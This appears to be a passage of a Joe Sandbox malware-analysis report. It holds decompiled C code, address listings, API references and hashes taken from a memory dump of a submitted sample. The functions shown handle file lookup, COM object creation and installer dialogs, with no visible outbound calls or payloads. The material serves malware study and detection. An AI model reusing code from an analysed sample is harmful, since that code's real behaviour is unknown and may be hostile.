								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406bfe
0x00406bfe
0x00406c03
0x00406c7a
0x00406c81
0x00406c8b
0x0040726a
0x0040726a
0x0040726d
0x0040726d
0x00407273
0x00407279
0x0040727f
0x00407299
0x0040729c
0x004072a2
0x004072ad
0x004072af
0x00407281
0x00407281
0x00407290
0x00407294
0x00407294
0x004072b9
0x004072e0
0x004072e0
0x004072e6
0x004072e6
0x00000000
0x004072bb
0x004072bb
0x004072bf
0x0040746e
0x00000000
0x0040746e
0x004072cb
0x004072d2
0x004072da
0x004072dd
0x00000000
0x004072dd
0x00406c05
0x00406c05
0x00406c09
0x00406c11
0x00406c14
0x00406c16
0x00406c19
0x00406c1b
0x00406c20
0x00406c23
0x00406c2a
0x00406c31
0x00406c34
0x00406c3f
0x00406c47
0x00406c47
0x00406c41
0x00406c41
0x00406c41
0x00406c36
0x00406c36
0x00406c36
0x00406c4e
0x00406c6c
0x00406c6e
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e93
0x00406e96
0x00406e39
0x00406e3f
0x00000000
0x00000000
0x00000000
0x00406e98
0x00406e14
0x00406e18
0x00407420
0x00000000
0x00407420
0x00406e1e
0x00406e21
0x00406e24
0x00406e28
0x00406e2b
0x00406e31
0x00406e33
0x00406e33
0x00406e36
0x00000000
0x00406e36
0x00406c50
0x00406c50
0x00406c53
0x00406c59
0x00406c5b
0x00406c5b
0x00406c5e
0x00406c61
0x00406c63
0x00406c64
0x00406c67
0x00406cd4
0x00406cd4
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce4
0x00406ce5
0x00406ce8
0x00406cea
0x00406cf0
0x00406cf3
0x00406cf6
0x00406cf9
0x00406cfc
0x00406d02
0x00406d1e
0x00406d21
0x00406d24
0x00406d27
0x00406d2e
0x00406d34
0x00406d38
0x00406d04
0x00406d04
0x00406d08
0x00406d10
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d42
0x00406d45
0x00406cbc
0x00406cbc
0x00406cc2
0x00406d75
0x00406d7b
0x00000000
0x00000000
0x00406d7d
0x00406d80
0x00406d83
0x00406d86
0x00406d89
0x00406d8c
0x00406d8f
0x00406d92
0x00406d95
0x00406d9b
0x00406db3
0x00406db6
0x00406db9
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc5
0x00406d9d
0x00406d9d
0x00406da5
0x00406daa
0x00406dac
0x00406dae
0x00406dae
0x00406dcf
0x00406dd2
0x00406d50
0x00406d54
0x00407414
0x00000000
0x00407414
0x00406d5a
0x00406d5d
0x00406d60
0x00406d64
0x00406d67
0x00406d6d
0x00406d6f
0x00406d6f
0x00406d72
0x00406d72
0x00406dd2
0x00406dd9
0x00406dd9
0x00406dd9
0x00406ddd
0x00406ddd
0x00406de0
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00406fa9
0x00406fa9
0x00406fac
0x00406fac
0x00000000
0x00406fac
0x00406cce
0x00000000
0x00000000
0x00000000
0x00406d4b
0x00406c97
0x00406c9b
0x00407408
0x00407484
0x0040748c
0x00407493
0x00407495
0x0040749c
0x004074a0
0x004074a0
0x00406ca1
0x00406ca4
0x00406ca7
0x00406cab
0x00406cae
0x00406cb4
0x00406cb6
0x00406cb6
0x00406cb9
0x00000000
0x00406cb9
0x00406d45
0x00406c4e
0x00406a82
0x00406a82
0x00406a8b
0x00407499
0x00407499
0x00000000
0x00407499
0x00406a91
0x00000000
0x00406a9c
0x00000000
0x00000000
0x00406aa5
0x00406aa8
0x00406aab
0x00406aaf
0x00000000
0x00000000
0x00406ab5
0x00406ab8
0x00406aba
0x00406abb
0x00406abe
0x00406ac0
0x00406ac1
0x00406ac3
0x00406ac6
0x00406acb
0x00406ad0
0x00406ad9
0x00406aec
0x00406aef
0x00406afb
0x00406b23
0x00406b25
0x00406b33
0x00406b33
0x00406b37
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b27
0x00406b27
0x00406b2a
0x00406b2b
0x00406b2b
0x00000000
0x00406b27
0x00406b01
0x00406b06
0x00406b06
0x00406b0f
0x00406b17
0x00406b1a
0x00000000
0x00406b20
0x00406b20
0x00000000
0x00406b20
0x00000000
0x00406b3d
0x00406b3d
0x00406b41
0x004073ed
0x00000000
0x004073ed
0x00406b4a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b60
0x00406b63
0x00406b67
0x00000000
0x00000000
0x00406b69
0x00406b6f
0x00406b99
0x00406b9f
0x00406ba6
0x00000000
0x00406ba6
0x00406b75
0x00406b78
0x00406b7d
0x00406b7d
0x00406b88
0x00406b90
0x00406b93
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406bd8
0x00406bde
0x00406be1
0x00406bee
0x00406bf6
0x00000000
0x00000000
0x00406bad
0x00406bad
0x00406bb1
0x004073fc
0x00000000
0x004073fc
0x00406bbd
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bcb
0x00406bce
0x00406bd1
0x00406bd6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e9d
0x00406ea1
0x00406ebf
0x00406ec2
0x00406ec9
0x00406ecc
0x00406ecf
0x00406ed2
0x00406ed5
0x00406ed8
0x00406eda
0x00406ee1
0x00406ee2
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406eed
0x00406ef2
0x00000000
0x00406ef2
0x00406ea3
0x00406ea6
0x00406ea9
0x00406eb3
0x00000000
0x00000000
0x00406f07
0x00406f0b
0x00406f2e
0x00406f31
0x00406f34
0x00406f3e
0x00406f0d
0x00406f0d
0x00406f10
0x00406f13
0x00406f16
0x00406f23
0x00406f26
0x00406f26
0x00000000
0x00000000
0x00406f4a
0x00406f4e
0x00000000
0x00000000
0x00406f54
0x00406f58
0x00000000
0x00000000
0x00406f5e
0x00406f60
0x00406f64
0x00406f64
0x00406f67
0x00406f6b
0x00000000
0x00000000
0x00406fbb
0x00406fbf
0x00406fc6
0x00406fc9
0x00406fcc
0x00406fd6
0x00000000
0x00406fd6
0x00406fc1
0x00000000
0x00000000
0x00406fe2
0x00406fe6
0x00406fed
0x00406ff0
0x00406ff3
0x00406fe8
0x00406fe8
0x00406fe8
0x00406ff6
0x00406ff9
0x00406ffc
0x00406ffc
0x00406fff
0x00407002
0x00407005
0x00407005
0x00407008
0x0040700f
0x00407014
0x00000000
0x00000000
0x004070a2
0x004070a2
0x004070a6
0x00407444
0x00000000
0x00407444
0x004070ac
0x004070af
0x004070b2
0x004070b6
0x004070b9
0x004070bf
0x004070c1
0x004070c1
0x004070c1
0x004070c4
0x004070c7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00406ef5
0x00406ef5
0x00406ef8
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f6e
0x00406f6e
0x00406f72
0x00407438
0x00000000
0x00407438
0x00406f78
0x00406f7b
0x00406f7e
0x00406f81
0x00406f83
0x00406f83
0x00406f83
0x00406f86
0x00406f89
0x00406f8c
0x00406f8f
0x00406f92
0x00406f95
0x00406f96
0x00406f98
0x00406f98
0x00406f98
0x00406f9b
0x00406f9e
0x00406fa1
0x00406fa4
0x00406fa4
0x00406fa4
0x00406fa7
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction ID: 53db679fe0595a89c24929100efc96b5d5a2697a31689bd0580b70dbb8294089
Opcode Fuzzy Hash: af4ab007fdbe3f375d412e85a9ad171fc41423b9a3793faa0b4874eb523c0645
Instruction Fuzzy Hash: 55F17770D04269CBDF18CFA8C8946ADBBB0FF44305F25816ED856BB281D7786A86CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040683D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040683D(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426758); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x426758;
			}

0x00406848
0x00406851
0x00000000
0x0040685e
0x00406854
0x00000000

APIs

FindFirstFileW.KERNELBASE(76CDFAA0,00426758,00425F10,00405F27,00425F10,00425F10,00000000,00425F10,00425F10,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 00406848
FindClose.KERNELBASE(00000000), ref: 00406854

Strings

XgB, xrefs: 0040683E

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: XgB
API String ID: 2295610775-796949446
Opcode ID: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction ID: 6b6802a92a84c0d1895eb5c997cd82d97c30a63e480feb254935e86212d72bfe
Opcode Fuzzy Hash: 23f64898245c7a8b5642f2b76d490ae2c21be458ceb9b1f3c1c58d2291370735
Instruction Fuzzy Hash: 4AD0C9325051205BC2402638AF0C84B6B9A9F563313228A36B5A6E11A0C6348C3286AC

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E4D( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56); // executed
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x436000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2a8 =  *0x42a2a8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
Opcode Fuzzy Hash: 6e6039761b8ed932a5d0a2857343db2613ced47da6fc2a90746a7ff2092a7e80
Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00403F64 Relevance: 51.4, APIs: 34, Instructions: 357
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E00403F64(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x4236f0 = _t34;
					if(_t130 == 0x110) {
						 *0x42a228 = _t127;
						 *0x423704 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216d0 = _t91;
						E00404463(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429208); // executed
						 *0x4291ec = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x4236f0 = 1;
					}
					_t124 =  *0x40a368; // 0x1
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a240;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E004044AF(0x40b);
						while(1) {
							_t36 =  *0x4236f0;
							 *0x40a368 =  *0x40a368 + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a368; // 0x1
							__eflags = _t38 -  *0x42a244;
							if(_t38 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291ec - _t136;
							if( *0x4291ec != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x1
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E00406544(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404463(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404463(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ac - _t136;
							_v28 = _t48;
							if( *0x42a2ac != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100); // executed
							E00404485(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x4216d0, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x423704);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x4216d0);
							}
							E00404498();
							E00406507(0x423708, E00403F45());
							E00406544(0x423708, _t127, _t133,  &(0x423708[lstrlenW(0x423708)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423708); // executed
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)), _t136);
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291f8); // executed
									 *0x4226e0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a220,  *_t133 +  *0x429200 & 0x0000ffff, _t127,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t73 - _t136;
									 *0x4291f8 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404463(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x4291f8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									E00401389( *((intOrPtr*)(_t133 + 0xc)), _t136);
									__eflags =  *0x4291ec - _t136;
									if( *0x4291ec != _t136) {
										goto L63;
									}
									ShowWindow( *0x4291f8, 8); // executed
									E004044AF(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x4291f8);
						 *0x42a228 = _t136;
						EndDialog(_t127,  *0x421ed8);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)), 0);
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x4291f8, 0x40f, 0, 1);
						__eflags =  *0x4291ec;
						return 0 |  *0x4291ec == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x4236e8, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
